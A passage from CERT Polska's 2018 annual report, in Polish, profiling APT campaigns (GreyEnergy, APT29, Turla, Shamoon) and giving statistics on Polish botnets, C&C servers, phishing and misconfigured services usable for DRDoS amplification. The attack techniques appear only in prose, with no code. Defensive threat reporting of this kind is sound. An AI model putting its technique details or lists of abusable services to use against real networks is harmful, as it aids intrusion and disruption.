146 https://threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/147 https://securelist.com/luckymouse-hits-national-data-center/86083/148 https://github.com/embedi/CVE-2017-11882149 https://www.leagsoft.com/150 https://ics.sans.org/media/E-ISAC_SANS_Ukraine_DUC_5.pdf151 https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine/152 https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf153 https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf154 https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/


Rysunek 75. Porównanie modułów backdoorów: po lewej stronie malware Exaramel, po prawej Industroyer (źródło: ESET155).

GreyEnergy w swoim bogatym arsenale narzędzi posiada malware dedykowany poszczególnym fazom ataku - jednym z nich jest backdoor o nazwie FELIXROOT do wstępnego badania zainfeko-wanej ofiary. Pierwsze ataki zostały zaobserwowane przez firmę FireEye we wrześniu 2017 roku156. Grupa najczęściej przeprowadzała ataki za pomocą ”uzbrojonych” dokumentów pakietów Microsoft Office: wykorzystywane były zarówno makra, jak i znane podatności: CVE-2017-0199157 oraz CVE-2017-11882. FELIXROOT nie wyróżnia się niczym szczególnym pod względem funkcjonalności wśród backdoorów “obecnych na rynku” - udostępnia mechanizmy uruchamiania plików, pobierania informacji o zarażonej maszynie i sieci, w której się znajduje.

Backdoor końcowej fazy ataku jest skuteczny i bardzo dobrze przygotowany: podpisany skradzio-nym podpisem cyfrowym tajwańskiej firmy Advantech, ma możliwość działania w pamięci oraz jako usługa w systemie operacyjnym. Modularna budowa umożliwia szybką rozbudowę o dodatkowe funkcjonalności. Badacze z firmy ESET zidentyfikowali dziewięć modułów odpowiedzialnych m.in. za wstrzykiwanie kodu, pozyskiwanie haseł użytkowników, tworzenie proxy i tuneli SSH w zain-fekowanej infrastrukturze. Cyberprzestępcy w atakach nie wykorzystywali wszystkich opracowa-nych modułów. Dobierano je w zależności od tego, jakie działania miały zostać przeprowadzone na danej maszynie. Malware wykorzystuje szereg technik utrudniających zarówno analizę próbki, jak i jej działań w systemie operacyjnym ofiary: próbki używają różniących się między sobą algorytmów szyfrowania. Bufory (np. zawierające stringi) po wykorzystaniu najpierw są zerowane, a dopiero w kolejnym kroku zwalniania jest pamięć. Podobnie wygląda sprawa z kasowanymi plikami: działanie funkcji DeleteFileA oraz DeleteFileW polega na przechwytywaniu i dodawaniu funkcji bezpiecznego kasowania plików, czyli nadpisanie zerami przed skasowaniem. Warto w tym miejscu dodać, że ser-wery zarządzające (C&C) każdej rodziny złośliwego oprogramowania w/w grup są ukryte w sieci Tor.

CozyDuke / APT29

Aktor powiązany z grupą APT28, atakujący głównie państwa dawnego Związku Radzieckiego oraz cele związane z aktualnie prowadzoną przez Rosję polityką zagraniczną. Przez większą część roku “uśpiona”, powróciła w listopadzie z szeroką kampanią phisingową celowaną w amerykańskie

155 https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/156 https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html157 https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html


instytucje publiczne, przedsiębiorstwa z branż: zbrojeniowej, farmaceutycznej, transportowej oraz media. Złośliwe maile zawierały archiwum ZIP z plikiem skrótu Windows, który odpowiadał za urucho-mienie środowiska PowerShell, którego celem było pobranie plików odpowiedzialnych za pierwszą fazę ataku. Przestępcy wykorzystali komercyjnie dostępne oprogramowanie do testów bezpieczeń-stwa Cobalt Strike. Wraz z malware na komputerze ofiary tworzony był plik z fałszywym dokumen-tem, rzekomo pochodzącym z Departamentu Stanu USA. Następna faza ataku przeprowadzana była ręcznie w zależności od pozyskanych danych o infrastrukturze ofiar oraz priorytetów grupy.

Podobieństwo tej kampanii z atakiem przeprowadzonym w listopadzie 2016 r., w związku z wybo-rami prezydenckimi w USA, z dużym stopniem pewności wskazuje na grupę jako inicjatora ataku: taka sama technika i bardzo podobna zawartość skrótów LNK, malware użyty do pierwszej fazy oraz zbliżony dobór ofiar.

Rysunek 76. Fałszywy dokument departamentu stanu USA wykorzystywany przez grupę CozyDuke (źródło: FireEye).

Turla / Snake

Turla jest trzecią grupą powiązaną z Federacją Rosyjską. Według estońskich służb wywiadowczych działa w strukturach Federalnej Służby Bezpieczeństwa158. Jej głównym celem są placówki dyplo-matyczne na całym świecie. W bogatym portfolio ofiar tej grupy znajdują się takie kraje jak: Polska, USA, Chiny, Niemcy, Francja, Arabia Saudyjska, Hiszpania oraz Iran. Jest to jedna z pierwszych zidentyfikowanych grup przeprowadzających ataki APT oraz uznawana jest za czołówkę zaawan-sowania technicznego na świecie - przykładem tego może być wykorzystywanie od 2007 r. łącz

158 https://www.valisluureamet.ee/pdf/raport-2018-ENG-web.pdf


satelitarnych do ukrywania położenia geograficznego swoich serwerów (wystarczy, że satelita była “widoczna” z poziomu anteny podłączonej do C&C i następował spoofing adresu IP)159.

Na początku 2018 r. za sprawą gazety Der Spiegel, zrobiło się głośno o tej grupie z powodu udanego ataku na niemieckie sieci rządowe160. Turla na przestrzeni roku znacząco rozwinęła swoje narzędzia wykorzystywane do ataków: backdoor napisany w JavaScript KopiLuwak oraz backdoor Carbon służący do późniejszych faz ataku. Wykorzystanie KopiLuwak w 2018 r. ograniczało się do celów w Syrii oraz Afganistanie. Malware dostarczany był za pomocą złośliwego pliku skrótu .lnk zawie-rającego kodowany payload. Interesujące jest, że niemalże identyczny skrypt wykorzystywany był w atakach grupy GreyEnergy161.

Warto zaznaczyć, że kampanie przeprowadzane przez grupę są bardzo dyskretne - ofiary wybiera-ne są starannie, a ataki bardzo dobrze przygotowane i często przeprowadzane w niestandardowy sposób - jest to przyczyną dużo mniejszej liczby obserwacji przez badaczy niż działania ofensywne przeprowadzane przez grupy: APT28, APT29 czy BlackEnergy.

Shamoon/Disttrack

Koniec roku 2018 przyniósł powrót, po około dwóch latach nieobecności, kolejnego destrukcyjnego narzędzia. Nowe próbki złośliwego oprogramowania o nazwie Shamoon, identyfikowanego również jako Disttrack, zostały opublikowane w serwisie VirusTotal 10 grudnia 2018 r. Oprogramowanie to zostało zaobserwowane w ataku na włoską spółkę Saipem zajmującą się wydobyciem oleju oraz gazu na Bliskim Wschodzie162. Według przedstawicieli firmy atak z grudnia objął około 300 ser-werów oraz 100 komputerów należących do firmowej sieci163. Oprogramowanie Shamoon zostało po raz pierwszy zaobserwowane w 2012 r. podczas kampanii wymierzonej w firmę Saudi Aramco, w wyniku której zostały usunięte dane z 35000 urządzeń należących do firmy.

W przeciwieństwie do kampanii obserwowanych w poprzednich latach, Shamoon działał w parze z oprogramowaniem do nadpisywania plików na dysku zainfekowanego urządzenia - Trojan.Filera-se. Firma Symantec opublikowała na swoim blogu wpis, w którym twierdzi, że posiada dowody na użycie Shamoon w tym samym tygodniu w atakach wobec dwóch innych firm zajmujących się prze-mysłem energetycznym w Arabii Saudyjskiej oraz Zjednoczonych Emiratach Arabskich164.

Głównym zadaniem nowo zaobserwowanej wersji Shamoon jest nadpisanie rekordu rozruchowego dysku Master Boot Record (MBR) losowo generowanymi danymi. Sam Shamoon składał się z trzech głównych komponentów: droppera, modułu usuwającego dane z dysku oraz modułu służącego do komunikacji z serwerem C&C, którego adres w wypadku wspomnianej próbki nie został wpisany.

Dropper, poza instalacją dwóch pozostałych modułów w systemie ofiary, miał za zadanie rozprze-strzenić malware do innych urządzeń znajdujących się w sieci lokalnej. Czynił to za pomocą wcze-śniej wykradzionych danych logowania165. Ponadto używał odczytywanej z kodu programu lub z pliku ‘%WINDOWS%\inf\mdmnis5tQ1.pnf’ daty, w zależności od której uruchamiane były pozostałe modu-ły oprogramowania. W przypadku zaobserwowanych próbek były to zawsze daty z grudnia 2017 r., co najprawdopodobniej miało dać pewność atakującym, że oprogramowanie uruchomi się zaraz po infekcji urządzenia ofiary. Głównym zadaniem modułu wipera - było nadpisywanie danych w MBR, partycji oraz plików systemowych do czego używał sterownika dysku twardego o nazwie RawDisk dystrybuowanego przez firmę EIDos. Po zakończonej modyfikacji tabeli partycji MBR program re-startował system sprawiając, że urządzenie nie mogło się ponownie uruchomić.

159 https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/160 http://www.spiegel.de/netzwelt/netzpolitik/hackerangriff-behoerden-vermuten-russische-hacker-gruppe-snake-als-taeter-a-1196089.html161 https://securelist.com/shedding-skin-turlas-fresh-faces/88069/162 http://www.saipem.com/sites/SAIPEM_en_IT/con-side-dx/Press%20releases/2018/Cyber%20attack%20update.page163 https://www.reuters.com/article/us-cyber-shamoon/saipem-says-shamoon-variant-crippled-hundreds-of-computers-idUSKBN1OB2FA164 https://www.symantec.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail165 https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/


Dodanie modułu Filerase, nadpisującego dane na dysku przed przystąpieniem do działania głów-nego modułu modyfikującego MBR, tylko zwiększyło destrukcyjne działanie oprogramowania, unie-możliwiając odzyskanie danych z dysków, nawet przy zastosowaniu standardowych metod infor-matyki śledczej, co było możliwe w przypadku starszych wersji Shamoon. Moduł nadpisujący dane w przypadku ataku na Saipem był dystrybuowany między urządzeniami na podstawie listy zdalnych urządzeń, pozyskanej w wyniku przeprowadzenia przez atakujących wcześniejszego rekonesansu. Komponent o nazwie OCLC.exe najpierw kopiował tę listę i przekazywał do narzędzia Spreader.exe, które kopiowało moduł nadpisujący dane na dysku na wszystkie urządzenia z listy oraz uru-chamiało go.

Co ciekawe, Shamoon nie posiadał funkcjonalności do rozprzestrzeniania się za pomocą popu-larnych protokołów sieciowych takich jak Server Message Block (SMB), często wykorzystywanych przez twórców złośliwego oprogramowania. Może to wskazywać na ręczną instalację Shamoon na pierwszym urządzeniu w sieci np. za pomocą wpięcia w port pamięci USB. Innym możliwym źró-dłem infekcji mogła być dostępna publicznie, słabo zabezpieczona usługa Remote Desktop Protocol (RDP).


Zdj.

unsp

lash

.com

, Bra

dley

Jasp

er Y

bane

z

940 079

5 206 170

39 211

702 591

77 536

unikalnych adresów IP wskazujących aktywność zombie

unikalnych adresów IP umożliwiających przeprowadzenie odbitych ataków DDoS

różnych adresów IP używanych jako serwery zarządzania botnetami

unikalnych adresów IP z uruchomionym otwartym resolverem

zgłoszeń phishingu w polskich sieciach

2018 w liczbach


Analizowane przez CERT Polska informacje o zagrożeniach pochodzą z wielu źródeł, m.in. z naszej działalności operacyjnej, automatycznych systemów monitorujących zagrożenia (np. sinkhole), ale przede wszystkim od podmiotów zewnętrznych, takich jak organizacje non-profit i niezależni bada-cze, CERT-y krajowe oraz firmy komercyjne.

Warto zauważyć, jak bardzo różnorodne są sposoby pozyskania informacji o zagrożeniach. Poniżej przedstawiamy kilka najczęściej wykorzystywanych:

• Dane o zainfekowanych komputerach (botach) są pozyskiwane przede wszystkim poprzez prze-jęcie infrastruktury botnetów (domeny C&C) i skierowanie ich na systemy typu sinkhole.

• Do wykrywania ataków na komputery, które udostępniają usługi w internecie (np. SSH, WWW), używane są honeypoty, czyli systemy-pułapki udające rzeczywiste serwery.

• W podobny sposób - przy użyciu honeypotów klienckich, czyli systemów udających przeglądarki WWW - mogą być wykrywane złośliwe strony WWW, które infekują użytkowników.

• Wykrycie podatnych usług, np. źle skonfigurowanych serwerów NTP, które mogą zostać wyko-rzystane do ataków DDoS, odbywa się poprzez skanowanie przestrzeni IPv4 na dużą skalę.

Ograniczenia

Dołożyliśmy starań, aby obraz sytuacji, który wynika z prezentowanych statystyk, trafnie opisywał wszystkie zagrożenia o dużej skali. Należy jednak pamiętać, że mają one pewne ograniczenia, wy-nikające głównie ze specyfiki dostępnych danych źródłowych.

Przede wszystkim nie jest możliwe zebranie pełnej informacji o wszystkich rodzajach zagrożeń. Naj-lepszym na to przykładem są ataki na konkretne podmioty lub grupy użytkowników (w przeciwień-stwie do ataków masowych), które zazwyczaj nie są rejestrowane przez nasze systemy monitorują-ce, ani zgłaszane do naszego zespołu. Problem z określeniem aktualnego stanu faktycznego wynika również z tego, że zagrożenie może być aktywne - nawet przez dłuższy czas - zanim zostanie zba-dane i rozpocznie się jego regularna obserwacja. Na przykład liczba zainfekowanych komputerów należących do botnetu, może być trudna do ustalenia, zanim zostanie on zneutralizowany poprzez przejęcie jego infrastruktury sterującej (C&C).

Bardzo ważne jest również określenie skali danego zagrożenia. Najczęściej zliczamy adresy IP po-wiązane z danym zagrożeniem zaobserwowane w ciągu dnia. Przyjmujemy tym samym założenie, że liczba adresów jest zbliżona do liczby urządzeń oraz użytkowników, których dany problem do-tyczy. Jest to metoda niedoskonała, ponieważ powszechnie wykorzystywane są dwa mechanizmy, które mają wpływ na widoczne publiczne adresy:

• NAT (translacja adresów) - powoduje niedoszacowanie, ponieważ za jednym zewnętrznym ad-resem IP często znajduje się wiele komputerów.

• DHCP (dynamiczna adresacja) - powoduje przeszacowanie, ponieważ np. ten sam zainfeko-wany komputer może w ciągu jednego dnia zostać wykryty kilkukrotnie pod różnymi adresami.

Można podejrzewać, że wpływ obu tych mechanizmów na uzyskane wyniki w dużej części się znosi, ale dokładne zbadanie skutków NAT i DHCP w tym kontekście wymagałoby osobnej analizy.

Statystyki


Ostatnia uwaga dotyczy wersji protokołu IP: wszystkie podane statystyki odnoszą się do wersji czwartej tego protokołu. Wynika to z niewielkiego stopnia wdrożenia IPv6 w naszym kraju, a co się z tym wiąże, z pomijalnie małej liczby zgłoszeń jakie otrzymujemy odnośnie tego rodzaju adresów.

Botnety

Botnety w Polsce

Tabela 10 prezentuje liczbę zainfekowanych komputerów w polskich sieciach. W 2018 r. zgromadzi-liśmy informacje o 940 079 unikalnych adresach IP wykazujących aktywność zombie.

Rodzina Rozmiar

Andromeda 6 059

Conficker 4 529

Mirai 1 969

Sality 1 531

Necurs 1 502

Isfb 1 412

Gamut 1 392

Stealrat 1 312

Nymaim 1 261

Pushdo 1 008

Tabela 10. Największe botnety w Polsce.

Wartości w tabeli 10. wskazują największą dzienną liczbę unikalnych adresów IP zainfekowanych komputerów w polskich sieciach. Wciąż obserwujemy średnio ponad 6 tys. infekcji botnetem Andro-meda dziennie. W porównaniu z rokiem 2017 ponad czterokrotnie spadła liczba infekcji botnetem Mirai. Conficker od wielu lat pozostaje w pierwszej trójce największych botnetów.

Zarejestrowaliśmy również wysoką aktywność botnetu Marcher. W szczytowym okresie zanotowa-liśmy ponad 20 tys. unikalnych adresów IP z systemem Android zainfekowanym tym trojanem. Jed-nak ze względu na brak ciągłości danych, nie publikujemy tych infekcji w ogólnym zestawieniu.

Aktywnośćbotnetówzpodziałemnaoperatorówtelekomunikacyjnych

Na wykresie 5. prezentujemy stopień zainfekowania użytkowników u największych operatorów tele-komunikacyjnych. Szacujemy go na podstawie liczby zainfekowanych unikalnych adresów IP. Sto-pień zainfekowania uzyskujemy, dzieląc liczbę botów przez liczbę klientów korzystających z dostępu do internetu u danego operatora. Wykorzystujemy przy tym dane z „Raportu o stanie rynku teleko-munikacyjnego w Polsce w 2017 roku” wydanego przez Urząd Komunikacji Elektronicznej.166

166 https://www.uke.gov.pl/download/gfx/uke/pl/defaultaktualnosci/36/93/1/raport_o_stanie_rynku_telekomunikacyjnego_-_2017_r..pdf

Statystyki


0,100%

0,200%

sty 2018 kwi 2018 lip 2018 paź 2018 sty 2019

stop

ień i

nfek

cji s

ieci

ISPMultimedia

Netia

Orange

P4

Plus / Cyf. Polsat

T−Mobile

UPC

Vectra

Wykres 5. Wykres zmian stopnia infekcji u operatorów w 2018 roku.

Liczba infekcji wśród polskich operatorów kształtowała się średnio na poziomie 13 tys. dziennie. Na przestrzeni roku zaobserwowaliśmy stopniowy spadek infekcji komputerów w polskich sieciach. Dominujący trend mają spadki infekcji botnetem Andromeda, szczególnie wśród operatorów Multi-media i Vectra. Spadki dotyczą również tzw. bankerów - ISFB, Nymaim oraz Tinba. W grudniu 2018 r. zaobserwowaliśmy dwukrotnie mniej infekcji tymi botnetami niż na początku roku.

Serwery C&C

W 2018 roku otrzymaliśmy informacje o 39 211 różnych adresach IP używanych jako serwery za-rządzania botnetami (C&C). Z uwagi na charakter zagrożenia, zdecydowaliśmy się opisać problem pod kątem lokalizacji adresu IP lub domeny najwyższego poziomu (TLD) nazwy domenowej C&C. W statystykach pominęliśmy zgłoszenia dotyczące serwerów sinkhole CERT Polska, których używa-my do unieszkodliwiania botnetów i wykrywania zainfekowanych maszyn.

Otrzymaliśmy zgłoszenia dotyczące adresów IP ze 150 krajów. Podobnie jak w poprzednich latach, najwięcej złośliwych serwerów było zlokalizowanych w Stanach Zjednoczonych (38 proc.). 74 proc. spośród wszystkich serwerów C&C utrzymywanych było w 10 krajach przedstawionych w tabeli 11.


Poz. Kraj Liczba IP Udział

1 USA 14 747 37,61%

2 Niemcy 2 792 7,12%

3 Rosja 2 779 7,09%

4 Holandia 2 215 5,65%

5 Francja 1 928 4,92%

6 Wielka Brytania 1 514 3,86%

7 Chiny 1 004 2,56%

8 Kanada 992 2,53%

9 Japonia 610 1,56%

10 Rumunia 561 1,43%

… … … …

17 Polska 383 0,98%

Tabela 11. Kraje z największą liczbą serwerów C&C.

Zaobserwowaliśmy 3 772 różne systemy autonomiczne, w których umiejscowione były serwery C&C. Dziesięć systemów autonomicznych zawierało ponad 24 proc. wszystkich złośliwych serwe-rów. Szczegóły znajdują się w tabeli 12.

Poz. Numer AS Nazwa Liczba IP Udział

1 16276 OVH 2 017 5,14%

2 13335 Cloudflare 1 623 4,14%

3 16509 Amazon 1 321 3,37%

4 26496 GoDaddy 985 2,51%

5 46606 Unified Layer 743 1,89%

6 20013 CyrusOne 720 1,84%

7 14618 Amazon 607 1,55%

8 24940 Hetzner Online GmbH 583 1,49%

9 8560 1&1 Internet SE 496 1,26%

10 14061 DigitalOcean 433 1,10%

Tabela 12. Systemy autonomiczne z największą liczbą serwerów C&C.


W Polsce serwery C&C były aktywne pod 383 różnymi adresami IP (17. miejsce z udziałem 0.98 proc.), w 98 systemach autonomicznych. W tabeli 13. prezentujemy zestawienie dziesięciu sys-temów autonomicznych, w których znajdowało się najwięcej złośliwych serwerów zarządzających botnetami. W sumie zawierały ponad połowę wszystkich C&C w Polsce.

Poz. Numer AS Nazwa AS Liczba IP Udział

1 12824 home.pl 67 17,49%

2 16276 OVH 41 10,70%

3 5617 Orange 28 7,31%

4 15967 Nazwa.pl 27 7,05%

5 41079 H88 14 3,66%

6 197226 Sprint 14 3,66%

7 29522 KEI 10 2,61%

8 21021 Multimedia 8 2,09%

9 198414 H88 8 2,09%

10 50599 Data Invest 7 1,83%

Tabela 13. Systemy autonomiczne, w których hostowanych jest najwięcej C&C w Polsce.

Otrzymaliśmy również zgłoszenia o 50 609 pełnych nazwach domenowych (FQDN), które pełniły rolę serwerów zarządzających botnetami. Zostały one zarejestrowane w obrębie 385 domen najwyż-szego poziomu (TLD), z czego ponad 40 proc. w TLD .com.

Zestawienie najpowszechniejszych TLD przedstawiamy w tabeli 14. Jako C&C wykorzystywanych było 330 domen w .pl, z czego dla 57 adresów domeną drugiego poziomu była cba.pl.

Poz. TLD Liczba Domen Udział

1 .com 20 638 40,78%

2 .net 8 339 16,48%

3 .org 1 957 3,87%

4 .ru 1 609 3,18%

5 .info 1 540 3,04%

6 .xyz 1 089 2,15%

7 .uk 1 034 2,04%

8 .pw 857 1,69%

9 .br 577 1,14%

10 .us 570 1,13%

... ... ... ...

17 .pl 330 0,65%

Tabela 14. Domeny najwyższego poziomu, w których zarejestrowano serwery C&C.


Phishing

W tym podrozdziale uwzględniamy wyłącznie statystyki dotyczące phishingu w tradycyjnym rozu-mieniu tego słowa, czyli podszywania się (przede wszystkim z wykorzystaniem poczty elektronicznej i stron WWW) pod znane marki, żeby wyłudzić wrażliwe dane. Nie odnosimy się więc ani do wyłu-dzania danych przy pomocy złośliwego oprogramowania, ani do podszywania się np. pod dostaw-ców faktur celem dystrybucji złośliwego oprogramowania. Statystyki dotyczą stron zlokalizowanych w Polsce, a więc nie uwzględniają ataków phishingowych na polskie instytucje przy użyciu stron utrzymywanych za granicą.

W roku 2018 otrzymaliśmy łącznie 77 536 zgłoszeń phishingu w polskich sieciach. Dotyczyły one adresów URL z 5 566 domen prowadzących do stron, które rozwiązywały się na 1 885 unikalnych adresów IP.

Poz. Numer AS Nazwa AS Liczba IP Liczba domen

1 12824 home.pl 553 930

2 15967 Nazwa AS 260 439

3 16276 OVH 113 306

4 205727 Aruba 92 321

5 41079 H88 90 296

6 5617 Orange 71 14

7 29522 KEI 66 95

8 198414 H88 48 110

9 197226 Sprint 43 1852

10 8308 NASK 36 63

Tabela 15. Polskie systemy autonomiczne, w których znajdowało się najwięcej stron phishingowych.

UsługipozwalającenaprowadzenieatakówDRDoS

W roku 2018 otrzymaliśmy informacje o 5 206 170 unikalnych adresach IP umożliwiających prze-prowadzenie odbitych ataków DDoS (Distributed Reflection Denial of Service - DRDoS), spośród których 1 916 673 działały na terenie Polski. Poniżej przedstawiamy zestawienie usług, które mogły być wykorzystane do ataków i były najliczniej reprezentowane w polskim internecie. Na kolejnych stronach omówimy te usługi. Uwzględniliśmy adresy IP z usługami które faktycznie są źle skon-figurowane, a także usługi, które są dostępne intencjonalnie (np. publiczne open resolvery) oraz systemy honeypot.

Rozmiar systemu autonomicznego (AS) ustaliliśmy na podstawie danych pochodzących z RIPE z 30 czerwca 2018 roku.


Poz. Nazwa usługi Średnia dzienna liczba unikalnych IP

Maksimum dzienne

Odchylenie standardo-

we

Czas obserwacji

1 dns 53 519 68 868 22 301 99,45%

2 snmp 29 094 34 280 5 721 90,96%

3 ntp 27 679 31 333 6 063 90,41%

4 portmapper 25 419 31 662 5 528 92,33%

5 ssdp 21 355 27 804 5 431 93,15%

6 netbios 17 909 37 599 5 843 93,15%

7 mdns 5 703 7 005 1 267 90,68%

8 mssql 4 420 5 092 757 93,15%

9 chargen 326 604 44 92,88%

10 qotd 83 112 16 92,88%

11 xdmcp 79 200 23 90,14%

Tabela 16. Zestawienie najpopularniejszych, niepoprawnie skonfigurowanych usług możliwych do wykorzystania w atakach DRDoS. Odchylenie standardowe dotyczy zmienności w dziennej liczbie adresów IP obserwowanych na przestrzeni roku, łączny czas obserwacji odpowiada części roku, dla których mieliśmy informacje o danej usłudze.

W ciągu roku zaobserwowaliśmy znaczące zmiany w liczbie obserwowanych urządzeń, które mogą zostać użyte do przeprowadzania ataku wzmocnionego DoS/DDoS. Na wykresie nr. 6. przedstawi-liśmy liczbę urządzeń, w rozbiciu na usługi dostępne z internetu, które mogą być wykorzystane do tego rodzaju ataków. Wykresy obrazują zmiany w dziennej liczbie unikalnych adresów IP zarejestro-wanych przez system n6 dla najczęściej zgłaszanych usług.

Pozytywnym trendem jest stopniowy, ale znaczący spadek liczby usług NTP, Portmapper oraz otwar-tych resolverów. Zauważalne wzrosty zanotowaliśmy natomiast dla usług SSDP – głównie za spra-wą zmiany w sieci Plus oraz T-Mobile.


resolverntp

portmapper

ssdpsnm

pnetbios

sty 2018 kwi 2018 lip 2018 paź 2018 sty 2019

55000

60000

65000

27000

28000

29000

30000

31000

25000

27500

30000

32500

20000

22000

24000

26000

28000

28000

30000

32000

34000

10000

20000

30000

Licz

ba a

dres

ów IP

Wykres 6. Najpowszechniejsze źle skonfigurowane usługi, mogące brać udział w atakach DDoS. Wykres ukazuje zmiany liczebności unikalnych adresów IP w Polsce w ciągu roku 2018.


Otwarte serwery DNS

Najpopularniejszą obserwowaną przez nas niebezpieczną usługą widoczną publicznie w polskim internecie jest DNS (Domain Name System), która służy do rozwiązywania nazw mnemonicznych na adresy IP. Pomimo jej kluczowego znaczenia dla działania Internetu, serwery DNS nie powin-ny odpowiadać na zapytania z całej sieci Internet (tzw. open resolver), lecz tylko na zapytania od ograniczonej grupy adresów. W roku 2018 otrzymaliśmy informacje o 702 591 unikalnych adresach IP z uruchomionym otwartym resolverem. To spadek o ok. 300 tys. w porównaniu z 2017 rokiem. Dzienna średnia wyniosła 53 519. Podobnie jak w ubiegłych latach, w zestawieniu systemów au-tonomicznych dominował system 5617 należący do Orange. Niepokojącym trendem jest rosnąca liczba open resolverów w sieci Netii (AS 12741) oraz wysoki odsetek adresów w sieciach Politechniki Koszalińskiej (AS 28797) oraz Onefone (AS 24577).

Poz. ASN Nazwa AS Średnia dzienna Maksimum

Odsetek wszystkich

adresów w AS

1 5617 Orange 38 958 52 069 0,70%

2 9143 Ziggo 4 454 4 856 0,12%

3 12741 NETIA 1 521 2 595 0,09%

4 6830 UPC 483 846 0,00%

5 29314 Vectra 480 695 0,09%

6 24577 Onefone 451 507 14,68%

7 35007 Miconet 370 528 5,16%

8 28797 Politechnika Koszalińska 339 339 16,55%

9 31242 3S 327 506 0,32%

10 20960 TK Telekom 303 460 0,12%

Tabela 17. Liczba adresów IP, na których wykryto otwarty serwer DNS w podziale na systemy autonomiczne.


SNMP

SNMP (Simple Network Management Protocol) to protokół stworzony do zdalnego zarządzania urządzeniami sieciowymi. Zalecane jest używanie go wyłącznie w odseparowanych sieciach dedy-kowanych zarządzaniu, istnieją jednak instancje SNMP widoczne w internecie. Poza zagrożeniem nieuprawnionego dostępu do urządzenia, usługa SNMP, do której można połączyć się z internetu, może być wykorzystana do ataków DDoS.

W 2018 r. zebraliśmy informacje o 804 243 unikalnych adresach IP pochodzących z Polski, na któ-rych udostępniono tę usługę. To spadek o ok. 200 tys. w porównaniu do 2017 r. Średnia dzienna wyniosła 29 094 unikalnych adresów IP. Utrzymuje się wysoki odsetek adresów w Powszechnej Agencji Informacyjnej. Uwagę zwraca również wysoki odsetek w sieci NETCOM (AS 199978). Zaob-serwowaliśmy gwałtowną tendencję spadkową (niemal do zera) w sieci Multimedia (AS 21021) oraz w sieci TK Telekom (z ok. 4,5 tys. na początku roku do niespełna 3 tys. na początku października i do końca roku).


Odsetek wszystkich

adresów w AS

1 12741 Netia 6 431 7 585 0,39%

2 5617 Orange 5 386 9 370 0,09%

3 20960 TK Telekom 3 541 4 482 1,42%

4 8798 Powszechna Agencja Informacyjna 890 972 11,21%

5 20804 Exatel 836 1 014 0,33%

6 43939 Internetia 478 617 0,18%

7 199978 NETCOM 332 412 10,80%

8 50606 Virtuaoperator 330 509 2,18%

9 8374 Polkomtel 329 394 0,02%

10 60920 Net Center 305 640 14,89%

Tabela 18. Liczba adresów IP, na których wykryto działającą usługę SNMP dostępną na publicznym interfejsie w podziale na systemy autonomiczne.


NTP

Network Time Protocol (NTP) jest powszechnym protokołem synchronizacji czasu używanym w sieciach komputerowych. Publicznie dostępne serwery NTP, które udostępniają polecenie monlist, mogą być jednak wykorzystane do ataków DDoS. W 2018 r. otrzymaliśmy łącznie 9 162 992 zgło-szenia o 367 882 unikalnych adresach IP (spadek o ok. 17 proc. w porównaniu do 2017 r.), średnia dzienna liczba unikalnych adresów wyniosła 27 679.


Odsetek wszystkich

adresów w AS

1 5617 Orange 7 486 8 582 0,13%

2 12741 Netia 2 896 3 482 0,17%

3 13110 INEA 680 837 0,40%

4 8374 Polkomtel 602 708 0,04%

5 31242 3S 554 998 0,55%

6 20960 TK Telekom 498 580 0,20%

7 197502 WMC 480 813 46,87%

8 9143 Ziggo 448 480 0,01%

9 8798 Powszechna Agencja Informacyjna 433 482 5,45%

10 6830 UPC 428 546 0,00%

Tabela 19. Liczba adresów IP, na których wykryto działającą usługę NTP dostępną na publicznym interfejsie w podziale na systemy autonomiczne.


Portmapper

Portmapper to niskopoziomowa usługa typowa dla uniksowych systemów operacyjnych. Korzystają z niej protokoły wyższych warstw, w tym m.in. NFS (sieciowy system plików). Publicznie dostępny portmapper stanowi zagrożenie ze względu na możliwość jego wykorzystania w atakach DDoS.

Średnio dziennie obserwujemy 25 419 adresów IP (spadek o ok. 20 proc. w porównaniu z danymi z 2017 r.), na których jest uruchomiona ta usługa. Uwagę zwraca duży odsetek adresów w sieciach H88 (choć malejący w skali roku) oraz ATMAN. Zauważalny jest również duży spadek w sieci KEI oraz nazwa.pl. Widzimy za to stopniowy wzrost w sieci najliczniej reprezentowanej - OVH.


Odsetek wszystkich

adresów w AS

1 16276 OVH 3 343 4 330 0,12%

2 5617 Orange 1 573 1 883 0,02%

3 57367 ATMAN 1 384 1 652 8,71%

4 41079 H88 1 074 1 782 14,46%

5 29522 KEI 1 067 1 832 1,56%

6 198414 H88 847 1 454 8,94%

7 29314 Vectra 802 921 0,15%

8 12741 Netia 769 974 0,04%

9 15967 Nazwa.pl 693 1 989 0,70%

10 197226 Sprint 375 660 2,44%

Tabela 20. Liczba adresów IP, na których wykryto działającą usługę Portmapper dostępną na publicznym interfejsie w podziale na systemy autonomiczne.


SSDP

Simple Service Discovery Protocol to protokół służący do wykrywania urządzeń, będący częścią standardu Universal Plug and Play (UPnP). SSDP w zamierzeniu jest wykorzystywany w niewielkich sieciach lokalnych i nie powinien być dostępny z internetu.

W 2018 r. otrzymaliśmy 7 260 981 zgłoszeń o 725 553 unikalnych adresach IP - to spadek o ponad 350 tys. w porównaniu do 2017 roku.Uwagę zwraca wysoki odsetek w sieci Derkom (AS 197697), gwałtowny spadek w sieci Servcom (do kilku unikalnych IP od końca sierpnia), powolny spadek w sieci Multimedia (o ponad połowę w ciągu roku) oraz niewielki wzrost w T-Mobile (AS 12912).


Odsetek wszystkich

adresów w AS

1 5617 Orange 5 594 7 108 0,10%

2 29314 Vectra 1 583 2 234 0,29%

3 12741 Netia 1 514 2 007 0,09%

4 41256 Servcom 1 079 1 903 2,84%

5 9143 Ziggo 874 1 152 0,02%

6 8374 Plus 717 973 0,05%

7 197697 Derkom 533 1 026 10,41%

8 50231 Syrion 473 596 4,73%

